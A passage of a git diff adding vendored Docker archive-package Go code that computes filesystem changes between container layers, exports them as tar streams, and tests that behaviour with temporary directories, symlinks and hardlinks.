+		oldDir = emptyDir
+	}
+	oldRoot, newRoot, err := collectFileInfoForChanges(oldDir, newDir)
+	if err != nil {
+		return nil, err
+	}
+
+	return newRoot.Changes(oldRoot), nil
+}
+
+// ChangesSize calculates the size in bytes of the provided changes, based on newDir.
+func ChangesSize(newDir string, changes []Change) int64 {
+	var (
+		size int64
+		sf   = make(map[uint64]struct{})
+	)
+	for _, change := range changes {
+		if change.Kind == ChangeModify || change.Kind == ChangeAdd {
+			file := filepath.Join(newDir, change.Path)
+			fileInfo, err := os.Lstat(file)
+			if err != nil {
+				logrus.Errorf("Can not stat %q: %s", file, err)
+				continue
+			}
+
+			if fileInfo != nil && !fileInfo.IsDir() {
+				if hasHardlinks(fileInfo) {
+					inode := getIno(fileInfo)
+					if _, ok := sf[inode]; !ok {
+						size += fileInfo.Size()
+						sf[inode] = struct{}{}
+					}
+				} else {
+					size += fileInfo.Size()
+				}
+			}
+		}
+	}
+	return size
+}
+
+// ExportChanges produces an Archive from the provided changes, relative to dir.
+func ExportChanges(dir string, changes []Change, uidMaps, gidMaps []idtools.IDMap) (io.ReadCloser, error) {
+	reader, writer := io.Pipe()
+	go func() {
+		ta := &tarAppender{
+			TarWriter: tar.NewWriter(writer),
+			Buffer:    pools.BufioWriter32KPool.Get(nil),
+			SeenFiles: make(map[uint64]string),
+			UIDMaps:   uidMaps,
+			GIDMaps:   gidMaps,
+		}
+		// this buffer is needed for the duration of this piped stream
+		defer pools.BufioWriter32KPool.Put(ta.Buffer)
+
+		sort.Sort(changesByPath(changes))
+
+		// In general we log errors here but ignore them because
+		// during e.g. a diff operation the container can continue
+		// mutating the filesystem and we can see transient errors
+		// from this
+		for _, change := range changes {
+			if change.Kind == ChangeDelete {
+				whiteOutDir := filepath.Dir(change.Path)
+				whiteOutBase := filepath.Base(change.Path)
+				whiteOut := filepath.Join(whiteOutDir, WhiteoutPrefix+whiteOutBase)
+				timestamp := time.Now()
+				hdr := &tar.Header{
+					Name:       whiteOut[1:],
+					Size:       0,
+					ModTime:    timestamp,
+					AccessTime: timestamp,
+					ChangeTime: timestamp,
+				}
+				if err := ta.TarWriter.WriteHeader(hdr); err != nil {
+					logrus.Debugf("Can't write whiteout header: %s", err)
+				}
+			} else {
+				path := filepath.Join(dir, change.Path)
+				if err := ta.addTarFile(path, change.Path[1:]); err != nil {
+					logrus.Debugf("Can't add file %s to tar: %s", path, err)
+				}
+			}
+		}
+
+		// Make sure to check the error on Close.
+		if err := ta.TarWriter.Close(); err != nil {
+			logrus.Debugf("Can't close layer: %s", err)
+		}
+		if err := writer.Close(); err != nil {
+			logrus.Debugf("failed close Changes writer: %s", err)
+		}
+	}()
+	return reader, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_linux.go b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go
new file mode 100644
index 0000000000..fc5a9dfdb9
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go
@@ -0,0 +1,312 @@
+package archive
+
+import (
+	"bytes"
+	"fmt"
+	"os"
+	"path/filepath"
+	"sort"
+	"syscall"
+	"unsafe"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+// walker is used to implement collectFileInfoForChanges on linux. Where this
+// method in general returns the entire contents of two directory trees, we
+// optimize some FS calls out on linux. In particular, we take advantage of the
+// fact that getdents(2) returns the inode of each file in the directory being
+// walked, which, when walking two trees in parallel to generate a list of
+// changes, can be used to prune subtrees without ever having to lstat(2) them
+// directly. Eliminating stat calls in this way can save up to seconds on large
+// images.
+type walker struct {
+	dir1  string
+	dir2  string
+	root1 *FileInfo
+	root2 *FileInfo
+}
+
+// collectFileInfoForChanges returns a complete representation of the trees
+// rooted at dir1 and dir2, with one important exception: any subtree or
+// leaf where the inode and device numbers are an exact match between dir1
+// and dir2 will be pruned from the results. This method is *only* to be used
+// to generating a list of changes between the two directories, as it does not
+// reflect the full contents.
+func collectFileInfoForChanges(dir1, dir2 string) (*FileInfo, *FileInfo, error) {
+	w := &walker{
+		dir1:  dir1,
+		dir2:  dir2,
+		root1: newRootFileInfo(),
+		root2: newRootFileInfo(),
+	}
+
+	i1, err := os.Lstat(w.dir1)
+	if err != nil {
+		return nil, nil, err
+	}
+	i2, err := os.Lstat(w.dir2)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	if err := w.walk("/", i1, i2); err != nil {
+		return nil, nil, err
+	}
+
+	return w.root1, w.root2, nil
+}
+
+// Given a FileInfo, its path info, and a reference to the root of the tree
+// being constructed, register this file with the tree.
+func walkchunk(path string, fi os.FileInfo, dir string, root *FileInfo) error {
+	if fi == nil {
+		return nil
+	}
+	parent := root.LookUp(filepath.Dir(path))
+	if parent == nil {
+		return fmt.Errorf("collectFileInfoForChanges: Unexpectedly no parent for %s", path)
+	}
+	info := &FileInfo{
+		name:     filepath.Base(path),
+		children: make(map[string]*FileInfo),
+		parent:   parent,
+	}
+	cpath := filepath.Join(dir, path)
+	stat, err := system.FromStatT(fi.Sys().(*syscall.Stat_t))
+	if err != nil {
+		return err
+	}
+	info.stat = stat
+	info.capability, _ = system.Lgetxattr(cpath, "security.capability") // lgetxattr(2): fs access
+	parent.children[info.name] = info
+	return nil
+}
+
+// Walk a subtree rooted at the same path in both trees being iterated. For
+// example, /docker/overlay/1234/a/b/c/d and /docker/overlay/8888/a/b/c/d
+func (w *walker) walk(path string, i1, i2 os.FileInfo) (err error) {
+	// Register these nodes with the return trees, unless we're still at the
+	// (already-created) roots:
+	if path != "/" {
+		if err := walkchunk(path, i1, w.dir1, w.root1); err != nil {
+			return err
+		}
+		if err := walkchunk(path, i2, w.dir2, w.root2); err != nil {
+			return err
+		}
+	}
+
+	is1Dir := i1 != nil && i1.IsDir()
+	is2Dir := i2 != nil && i2.IsDir()
+
+	sameDevice := false
+	if i1 != nil && i2 != nil {
+		si1 := i1.Sys().(*syscall.Stat_t)
+		si2 := i2.Sys().(*syscall.Stat_t)
+		if si1.Dev == si2.Dev {
+			sameDevice = true
+		}
+	}
+
+	// If these files are both non-existent, or leaves (non-dirs), we are done.
+	if !is1Dir && !is2Dir {
+		return nil
+	}
+
+	// Fetch the names of all the files contained in both directories being walked:
+	var names1, names2 []nameIno
+	if is1Dir {
+		names1, err = readdirnames(filepath.Join(w.dir1, path)) // getdents(2): fs access
+		if err != nil {
+			return err
+		}
+	}
+	if is2Dir {
+		names2, err = readdirnames(filepath.Join(w.dir2, path)) // getdents(2): fs access
+		if err != nil {
+			return err
+		}
+	}
+
+	// We have lists of the files contained in both parallel directories, sorted
+	// in the same order. Walk them in parallel, generating a unique merged list
+	// of all items present in either or both directories.
+	var names []string
+	ix1 := 0
+	ix2 := 0
+
+	for {
+		if ix1 >= len(names1) {
+			break
+		}
+		if ix2 >= len(names2) {
+			break
+		}
+
+		ni1 := names1[ix1]
+		ni2 := names2[ix2]
+
+		switch bytes.Compare([]byte(ni1.name), []byte(ni2.name)) {
+		case -1: // ni1 < ni2 -- advance ni1
+			// we will not encounter ni1 in names2
+			names = append(names, ni1.name)
+			ix1++
+		case 0: // ni1 == ni2
+			if ni1.ino != ni2.ino || !sameDevice {
+				names = append(names, ni1.name)
+			}
+			ix1++
+			ix2++
+		case 1: // ni1 > ni2 -- advance ni2
+			// we will not encounter ni2 in names1
+			names = append(names, ni2.name)
+			ix2++
+		}
+	}
+	for ix1 < len(names1) {
+		names = append(names, names1[ix1].name)
+		ix1++
+	}
+	for ix2 < len(names2) {
+		names = append(names, names2[ix2].name)
+		ix2++
+	}
+
+	// For each of the names present in either or both of the directories being
+	// iterated, stat the name under each root, and recurse the pair of them:
+	for _, name := range names {
+		fname := filepath.Join(path, name)
+		var cInfo1, cInfo2 os.FileInfo
+		if is1Dir {
+			cInfo1, err = os.Lstat(filepath.Join(w.dir1, fname)) // lstat(2): fs access
+			if err != nil && !os.IsNotExist(err) {
+				return err
+			}
+		}
+		if is2Dir {
+			cInfo2, err = os.Lstat(filepath.Join(w.dir2, fname)) // lstat(2): fs access
+			if err != nil && !os.IsNotExist(err) {
+				return err
+			}
+		}
+		if err = w.walk(fname, cInfo1, cInfo2); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// {name,inode} pairs used to support the early-pruning logic of the walker type
+type nameIno struct {
+	name string
+	ino  uint64
+}
+
+type nameInoSlice []nameIno
+
+func (s nameInoSlice) Len() int           { return len(s) }
+func (s nameInoSlice) Swap(i, j int)      { s[i], s[j] = s[j], s[i] }
+func (s nameInoSlice) Less(i, j int) bool { return s[i].name < s[j].name }
+
+// readdirnames is a hacked-apart version of the Go stdlib code, exposing inode
+// numbers further up the stack when reading directory contents. Unlike
+// os.Readdirnames, which returns a list of filenames, this function returns a
+// list of {filename,inode} pairs.
+func readdirnames(dirname string) (names []nameIno, err error) {
+	var (
+		size = 100
+		buf  = make([]byte, 4096)
+		nbuf int
+		bufp int
+		nb   int
+	)
+
+	f, err := os.Open(dirname)
+	if err != nil {
+		return nil, err
+	}
+	defer f.Close()
+
+	names = make([]nameIno, 0, size) // Empty with room to grow.
+	for {
+		// Refill the buffer if necessary
+		if bufp >= nbuf {
+			bufp = 0
+			nbuf, err = syscall.ReadDirent(int(f.Fd()), buf) // getdents on linux
+			if nbuf < 0 {
+				nbuf = 0
+			}
+			if err != nil {
+				return nil, os.NewSyscallError("readdirent", err)
+			}
+			if nbuf <= 0 {
+				break // EOF
+			}
+		}
+
+		// Drain the buffer
+		nb, names = parseDirent(buf[bufp:nbuf], names)
+		bufp += nb
+	}
+
+	sl := nameInoSlice(names)
+	sort.Sort(sl)
+	return sl, nil
+}
+
+// parseDirent is a minor modification of syscall.ParseDirent (linux version)
+// which returns {name,inode} pairs instead of just names.
+func parseDirent(buf []byte, names []nameIno) (consumed int, newnames []nameIno) {
+	origlen := len(buf)
+	for len(buf) > 0 {
+		dirent := (*syscall.Dirent)(unsafe.Pointer(&buf[0]))
+		buf = buf[dirent.Reclen:]
+		if dirent.Ino == 0 { // File absent in directory.
+			continue
+		}
+		bytes := (*[10000]byte)(unsafe.Pointer(&dirent.Name[0]))
+		var name = string(bytes[0:clen(bytes[:])])
+		if name == "." || name == ".." { // Useless names
+			continue
+		}
+		names = append(names, nameIno{name, dirent.Ino})
+	}
+	return origlen - len(buf), names
+}
+
+func clen(n []byte) int {
+	for i := 0; i < len(n); i++ {
+		if n[i] == 0 {
+			return i
+		}
+	}
+	return len(n)
+}
+
+// OverlayChanges walks the path rw and determines changes for the files in the path,
+// with respect to the parent layers
+func OverlayChanges(layers []string, rw string) ([]Change, error) {
+	return changes(layers, rw, overlayDeletedFile, nil)
+}
+
+func overlayDeletedFile(root, path string, fi os.FileInfo) (string, error) {
+	if fi.Mode()&os.ModeCharDevice != 0 {
+		s := fi.Sys().(*syscall.Stat_t)
+		if major(uint64(s.Rdev)) == 0 && minor(uint64(s.Rdev)) == 0 {
+			return path, nil
+		}
+	}
+	if fi.Mode()&os.ModeDir != 0 {
+		opaque, err := system.Lgetxattr(filepath.Join(root, path), "trusted.overlay.opaque")
+		if err != nil {
+			return "", err
+		}
+		if len(opaque) == 1 && opaque[0] == 'y' {
+			return path, nil
+		}
+	}
+
+	return "", nil
+
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_other.go b/vendor/github.com/docker/docker/pkg/archive/changes_other.go
new file mode 100644
index 0000000000..da70ed37c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_other.go
@@ -0,0 +1,97 @@
+// +build !linux
+
+package archive
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"runtime"
+	"strings"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+func collectFileInfoForChanges(oldDir, newDir string) (*FileInfo, *FileInfo, error) {
+	var (
+		oldRoot, newRoot *FileInfo
+		err1, err2       error
+		errs             = make(chan error, 2)
+	)
+	go func() {
+		oldRoot, err1 = collectFileInfo(oldDir)
+		errs <- err1
+	}()
+	go func() {
+		newRoot, err2 = collectFileInfo(newDir)
+		errs <- err2
+	}()
+
+	// block until both routines have returned
+	for i := 0; i < 2; i++ {
+		if err := <-errs; err != nil {
+			return nil, nil, err
+		}
+	}
+
+	return oldRoot, newRoot, nil
+}
+
+func collectFileInfo(sourceDir string) (*FileInfo, error) {
+	root := newRootFileInfo()
+
+	err := filepath.Walk(sourceDir, func(path string, f os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+
+		// Rebase path
+		relPath, err := filepath.Rel(sourceDir, path)
+		if err != nil {
+			return err
+		}
+
+		// As this runs on the daemon side, file paths are OS specific.
+		relPath = filepath.Join(string(os.PathSeparator), relPath)
+
+		// See https://github.com/golang/go/issues/9168 - bug in filepath.Join.
+		// Temporary workaround. If the returned path starts with two backslashes,
+		// trim it down to a single backslash. Only relevant on Windows.
+		if runtime.GOOS == "windows" {
+			if strings.HasPrefix(relPath, `\\`) {
+				relPath = relPath[1:]
+			}
+		}
+
+		if relPath == string(os.PathSeparator) {
+			return nil
+		}
+
+		parent := root.LookUp(filepath.Dir(relPath))
+		if parent == nil {
+			return fmt.Errorf("collectFileInfo: Unexpectedly no parent for %s", relPath)
+		}
+
+		info := &FileInfo{
+			name:     filepath.Base(relPath),
+			children: make(map[string]*FileInfo),
+			parent:   parent,
+		}
+
+		s, err := system.Lstat(path)
+		if err != nil {
+			return err
+		}
+		info.stat = s
+
+		info.capability, _ = system.Lgetxattr(path, "security.capability")
+
+		parent.children[info.name] = info
+
+		return nil
+	})
+	if err != nil {
+		return nil, err
+	}
+	return root, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go
new file mode 100644
index 0000000000..095102e578
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go
@@ -0,0 +1,132 @@
+package archive
+
+import (
+	"archive/tar"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path"
+	"runtime"
+	"sort"
+	"testing"
+)
+
+func TestHardLinkOrder(t *testing.T) {
+	//TODO Should run for Solaris
+	if runtime.GOOS == "solaris" {
+		t.Skip("gcp failures on Solaris")
+	}
+	names := []string{"file1.txt", "file2.txt", "file3.txt"}
+	msg := []byte("Hey y'all")
+
+	// Create dir
+	src, err := ioutil.TempDir("", "docker-hardlink-test-src-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(src)
+	for _, name := range names {
+		func() {
+			fh, err := os.Create(path.Join(src, name))
+			if err != nil {
+				t.Fatal(err)
+			}
+			defer fh.Close()
+			if _, err = fh.Write(msg); err != nil {
+				t.Fatal(err)
+			}
+		}()
+	}
+	// Create dest, with changes that includes hardlinks
+	dest, err := ioutil.TempDir("", "docker-hardlink-test-dest-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	os.RemoveAll(dest) // we just want the name, at first
+	if err := copyDir(src, dest); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dest)
+	for _, name := range names {
+		for i := 0; i < 5; i++ {
+			if err := os.Link(path.Join(dest, name), path.Join(dest, fmt.Sprintf("%s.link%d", name, i))); err != nil {
+				t.Fatal(err)
+			}
+		}
+	}
+
+	// get changes
+	changes, err := ChangesDirs(dest, src)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// sort
+	sort.Sort(changesByPath(changes))
+
+	// ExportChanges
+	ar, err := ExportChanges(dest, changes, nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	hdrs, err := walkHeaders(ar)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// reverse sort
+	sort.Sort(sort.Reverse(changesByPath(changes)))
+	// ExportChanges
+	arRev, err := ExportChanges(dest, changes, nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	hdrsRev, err := walkHeaders(arRev)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// line up the two sets
+	sort.Sort(tarHeaders(hdrs))
+	sort.Sort(tarHeaders(hdrsRev))
+
+	// compare Size and LinkName
+	for i := range hdrs {
+		if hdrs[i].Name != hdrsRev[i].Name {
+			t.Errorf("headers - expected name %q; but got %q", hdrs[i].Name, hdrsRev[i].Name)
+		}
+		if hdrs[i].Size != hdrsRev[i].Size {
+			t.Errorf("headers - %q expected size %d; but got %d", hdrs[i].Name, hdrs[i].Size, hdrsRev[i].Size)
+		}
+		if hdrs[i].Typeflag != hdrsRev[i].Typeflag {
+			t.Errorf("headers - %q expected type %d; but got %d", hdrs[i].Name, hdrs[i].Typeflag, hdrsRev[i].Typeflag)
+		}
+		if hdrs[i].Linkname != hdrsRev[i].Linkname {
+			t.Errorf("headers - %q expected linkname %q; but got %q", hdrs[i].Name, hdrs[i].Linkname, hdrsRev[i].Linkname)
+		}
+	}
+
+}
+
+type tarHeaders []tar.Header
+
+func (th tarHeaders) Len() int           { return len(th) }
+func (th tarHeaders) Swap(i, j int)      { th[j], th[i] = th[i], th[j] }
+func (th tarHeaders) Less(i, j int) bool { return th[i].Name < th[j].Name }
+
+func walkHeaders(r io.Reader) ([]tar.Header, error) {
+	t := tar.NewReader(r)
+	headers := []tar.Header{}
+	for {
+		hdr, err := t.Next()
+		if err != nil {
+			if err == io.EOF {
+				break
+			}
+			return headers, err
+		}
+		headers = append(headers, *hdr)
+	}
+	return headers, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_test.go
new file mode 100644
index 0000000000..eae1d022c7
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/archive/changes_test.go
@@ -0,0 +1,572 @@
+package archive
+
+import (
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path"
+	"runtime"
+	"sort"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/system"
+)
+
+func max(x, y int) int {
+	if x >= y {
+		return x
+	}
+	return y
+}
+
+func copyDir(src, dst string) error {
+	cmd := exec.Command("cp", "-a", src, dst)
+	if runtime.GOOS == "solaris" {
+		cmd = exec.Command("gcp", "-a", src, dst)
+	}
+
+	if err := cmd.Run(); err != nil {
+		return err
+	}
+	return nil
+}
+
+type FileType uint32
+
+const (
+	Regular FileType = iota
+	Dir
+	Symlink
+)
+
+type FileData struct {
+	filetype    FileType
+	path        string
+	contents    string
+	permissions os.FileMode
+}
+
+func createSampleDir(t *testing.T, root string) {
+	files := []FileData{
+		{Regular, "file1", "file1\n", 0600},
+		{Regular, "file2", "file2\n", 0666},
+		{Regular, "file3", "file3\n", 0404},
+		{Regular, "file4", "file4\n", 0600},
+		{Regular, "file5", "file5\n", 0600},
+		{Regular, "file6", "file6\n", 0600},
+		{Regular, "file7", "file7\n", 0600},
+		{Dir, "dir1", "", 0740},
+		{Regular, "dir1/file1-1", "file1-1\n", 01444},
+		{Regular, "dir1/file1-2", "file1-2\n", 0666},
+		{Dir, "dir2", "", 0700},
+		{Regular, "dir2/file2-1", "file2-1\n", 0666},
+		{Regular, "dir2/file2-2", "file2-2\n", 0666},
+		{Dir, "dir3", "", 0700},
+		{Regular, "dir3/file3-1", "file3-1\n", 0666},
+		{Regular, "dir3/file3-2", "file3-2\n", 0666},
+		{Dir, "dir4", "", 0700},
+		{Regular, "dir4/file3-1", "file4-1\n", 0666},
+		{Regular, "dir4/file3-2", "file4-2\n", 0666},
+		{Symlink, "symlink1", "target1", 0666},
+		{Symlink, "symlink2", "target2", 0666},
+		{Symlink, "symlink3", root + "/file1", 0666},
+		{Symlink, "symlink4", root + "/symlink3", 0666},
+		{Symlink, "dirSymlink", root + "/dir1", 0740},
+	}
+
+	now := time.Now()
+	for _, info := range files {
+		p := path.Join(root, info.path)
+		if info.filetype == Dir {
+			if err := os.MkdirAll(p, info.permissions); err != nil {
+				t.Fatal(err)
+			}
+		} else if info.filetype == Regular {
+			if err := ioutil.WriteFile(p, []byte(info.contents), info.permissions); err != nil {
+				t.Fatal(err)
+			}
+		} else if info.filetype == Symlink {
+			if err := os.Symlink(info.contents, p); err != nil {
+				t.Fatal(err)
+			}
+		}
+
+		if info.filetype != Symlink {
+			// Set a consistent ctime, atime for all files and dirs
+			if err := system.Chtimes(p, now, now); err != nil {
+				t.Fatal(err)
+			}
+		}
+	}
+}
+
+func TestChangeString(t *testing.T) {
+	modifiyChange := Change{"change", ChangeModify}
+	toString := modifiyChange.String()
+	if toString != "C change" {
+		t.Fatalf("String() of a change with ChangeModifiy Kind should have been %s but was %s", "C change", toString)
+	}
+	addChange := Change{"change", ChangeAdd}
+	toString = addChange.String()
+	if toString != "A change" {
+		t.Fatalf("String() of a change with ChangeAdd Kind should have been %s but was %s", "A change", toString)
+	}
+	deleteChange := Change{"change", ChangeDelete}
+	toString = deleteChange.String()
+	if toString != "D change" {
+		t.Fatalf("String() of a change with ChangeDelete Kind should have been %s but was %s", "D change", toString)
+	}
+}
+
+func TestChangesWithNoChanges(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	// as createSampleDir uses symlinks.
+	if runtime.GOOS == "windows" {
+		t.Skip("symlinks on Windows")
+	}
+	rwLayer, err := ioutil.TempDir("", "docker-changes-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(rwLayer)
+	layer, err := ioutil.TempDir("", "docker-changes-test-layer")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(layer)
+	createSampleDir(t, layer)
+	changes, err := Changes([]string{layer}, rwLayer)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(changes) != 0 {
+		t.Fatalf("Changes with no difference should have detect no changes, but detected %d", len(changes))
+	}
+}
+
+func TestChangesWithChanges(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	// as createSampleDir uses symlinks.
+	if runtime.GOOS == "windows" {
+		t.Skip("symlinks on Windows")
+	}
+	// Mock the readonly layer
+	layer, err := ioutil.TempDir("", "docker-changes-test-layer")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(layer)
+	createSampleDir(t, layer)
+	os.MkdirAll(path.Join(layer, "dir1/subfolder"), 0740)
+
+	// Mock the RW layer
+	rwLayer, err := ioutil.TempDir("", "docker-changes-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(rwLayer)
+
+	// Create a folder in RW layer
+	dir1 := path.Join(rwLayer, "dir1")
+	os.MkdirAll(dir1, 0740)
+	deletedFile := path.Join(dir1, ".wh.file1-2")
+	ioutil.WriteFile(deletedFile, []byte{}, 0600)
+	modifiedFile := path.Join(dir1, "file1-1")
+	ioutil.WriteFile(modifiedFile, []byte{0x00}, 01444)
+	// Let's add a subfolder for a newFile
+	subfolder := path.Join(dir1, "subfolder")
+	os.MkdirAll(subfolder, 0740)
+	newFile := path.Join(subfolder, "newFile")
+	ioutil.WriteFile(newFile, []byte{}, 0740)
+
+	changes, err := Changes([]string{layer}, rwLayer)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expectedChanges := []Change{
+		{"/dir1", ChangeModify},
+		{"/dir1/file1-1", ChangeModify},
+		{"/dir1/file1-2", ChangeDelete},
+		{"/dir1/subfolder", ChangeModify},
+		{"/dir1/subfolder/newFile", ChangeAdd},
+	}
+	checkChanges(expectedChanges, changes, t)
+}
+
+// See https://github.com/docker/docker/pull/13590
+func TestChangesWithChangesGH13590(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	// as createSampleDir uses symlinks.
+	if runtime.GOOS == "windows" {
+		t.Skip("symlinks on Windows")
+	}
+	baseLayer, err := ioutil.TempDir("", "docker-changes-test.")
+	defer os.RemoveAll(baseLayer)
+
+	dir3 := path.Join(baseLayer, "dir1/dir2/dir3")
+	os.MkdirAll(dir3, 07400)
+
+	file := path.Join(dir3, "file.txt")
+	ioutil.WriteFile(file, []byte("hello"), 0666)
+
+	layer, err := ioutil.TempDir("", "docker-changes-test2.")
+	defer os.RemoveAll(layer)
+
+	// Test creating a new file
+	if err := copyDir(baseLayer+"/dir1", layer+"/"); err != nil {
+		t.Fatalf("Cmd failed: %q", err)
+	}
+
+	os.Remove(path.Join(layer, "dir1/dir2/dir3/file.txt"))
+	file = path.Join(layer, "dir1/dir2/dir3/file1.txt")
+	ioutil.WriteFile(file, []byte("bye"), 0666)
+
+	changes, err := Changes([]string{baseLayer}, layer)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expectedChanges := []Change{
+		{"/dir1/dir2/dir3", ChangeModify},
+		{"/dir1/dir2/dir3/file1.txt", ChangeAdd},
+	}
+	checkChanges(expectedChanges, changes, t)
+
+	// Now test changing a file
+	layer, err = ioutil.TempDir("", "docker-changes-test3.")
+	defer os.RemoveAll(layer)
+
+	if err := copyDir(baseLayer+"/dir1", layer+"/"); err != nil {
+		t.Fatalf("Cmd failed: %q", err)
+	}
+
+	file = path.Join(layer, "dir1/dir2/dir3/file.txt")
+	ioutil.WriteFile(file, []byte("bye"), 0666)
+
+	changes, err = Changes([]string{baseLayer}, layer)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	expectedChanges = []Change{
+		{"/dir1/dir2/dir3/file.txt", ChangeModify},
+	}
+	checkChanges(expectedChanges, changes, t)
+}
+
+// Create a directory, copy it, make sure we report no changes between the two
+func TestChangesDirsEmpty(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	// as createSampleDir uses symlinks.
+	// TODO Should work for Solaris
+	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
+		t.Skip("symlinks on Windows; gcp failure on Solaris")
+	}
+	src, err := ioutil.TempDir("", "docker-changes-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(src)
+	createSampleDir(t, src)
+	dst := src + "-copy"
+	if err := copyDir(src, dst); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(dst)
+	changes, err := ChangesDirs(dst, src)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(changes) != 0 {
+		t.Fatalf("Reported changes for identical dirs: %v", changes)
+	}
+	os.RemoveAll(src)
+	os.RemoveAll(dst)
+}
+
+func mutateSampleDir(t *testing.T, root string) {
+	// Remove a regular file
+	if err := os.RemoveAll(path.Join(root, "file1")); err != nil {
+		t.Fatal(err)
+	}
+
+	// Remove a directory
+	if err := os.RemoveAll(path.Join(root, "dir1")); err != nil {
+		t.Fatal(err)
+	}
+
+	// Remove a symlink
+	if err := os.RemoveAll(path.Join(root, "symlink1")); err != nil {
+		t.Fatal(err)
+	}
+
+	// Rewrite a file
+	if err := ioutil.WriteFile(path.Join(root, "file2"), []byte("fileNN\n"), 0777); err != nil {
+		t.Fatal(err)
+	}
+
+	// Replace a file
+	if err := os.RemoveAll(path.Join(root, "file3")); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(path.Join(root, "file3"), []byte("fileMM\n"), 0404); err != nil {
+		t.Fatal(err)
+	}
+
+	// Touch file
+	if err := system.Chtimes(path.Join(root, "file4"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil {
+		t.Fatal(err)
+	}
+
+	// Replace file with dir
+	if err := os.RemoveAll(path.Join(root, "file5")); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.MkdirAll(path.Join(root, "file5"), 0666); err != nil {
+		t.Fatal(err)
+	}
+
+	// Create new file
+	if err := ioutil.WriteFile(path.Join(root, "filenew"), []byte("filenew\n"), 0777); err != nil {
+		t.Fatal(err)
+	}
+
+	// Create new dir
+	if err := os.MkdirAll(path.Join(root, "dirnew"), 0766); err != nil {
+		t.Fatal(err)
+	}
+
+	// Create a new symlink
+	if err := os.Symlink("targetnew", path.Join(root, "symlinknew")); err != nil {
+		t.Fatal(err)
+	}
+
+	// Change a symlink
+	if err := os.RemoveAll(path.Join(root, "symlink2")); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.Symlink("target2change", path.Join(root, "symlink2")); err != nil {
+		t.Fatal(err)
+	}
+
+	// Replace dir with file
+	if err := os.RemoveAll(path.Join(root, "dir2")); err != nil {
+		t.Fatal(err)
+	}
+	if err := ioutil.WriteFile(path.Join(root, "dir2"), []byte("dir2\n"), 0777); err != nil {
+		t.Fatal(err)
+	}
+
+	// Touch dir
+	if err := system.Chtimes(path.Join(root, "dir3"), time.Now().Add(time.Second), time.Now().Add(time.Second)); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestChangesDirsMutated(t *testing.T) {
+	// TODO Windows. There may be a way of running this, but turning off for now
+	// as createSampleDir uses symlinks.
+	// TODO Should work for Solaris
+	if runtime.GOOS == "windows" || runtime.GOOS == "solaris" {
+		t.Skip("symlinks on Windows; gcp failures on Solaris")
+	}
+	src, err := ioutil.TempDir("", "docker-changes-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	createSampleDir(t, src)
+	dst := src + "-copy"
+	if err := copyDir(src, dst); err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(src)
+	defer os.RemoveAll(dst)
+
+	mutateSampleDir(t, dst)
+
+	changes, err := ChangesDirs(dst, src)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	sort.Sort(changesByPath(changes))
+
+	expectedChanges := []Change{
+		{"/dir1", ChangeDelete},
+		{"/dir2", ChangeModify},
+		{"/dirnew", ChangeAdd},
+		{"/file1", ChangeDelete},
+		{"/file2", ChangeModify},
+		{"/file3", ChangeModify},
+		{"/file4", ChangeModify},
+		{"/file5", ChangeModify},
+		{"/filenew", ChangeAdd},
+		{"/symlink1", ChangeDelete},
+		{"/symlink2", ChangeModify},
+		{"/symlinknew", ChangeAdd},
+	}
+
+	for i := 0; i < max(len(changes), len(expectedChanges)); i++ {
+		if i >= len(expectedChanges) {
+			t.Fatalf("unexpected change %s\n", changes[i].String())
+		}
+		if i >= len(changes) {
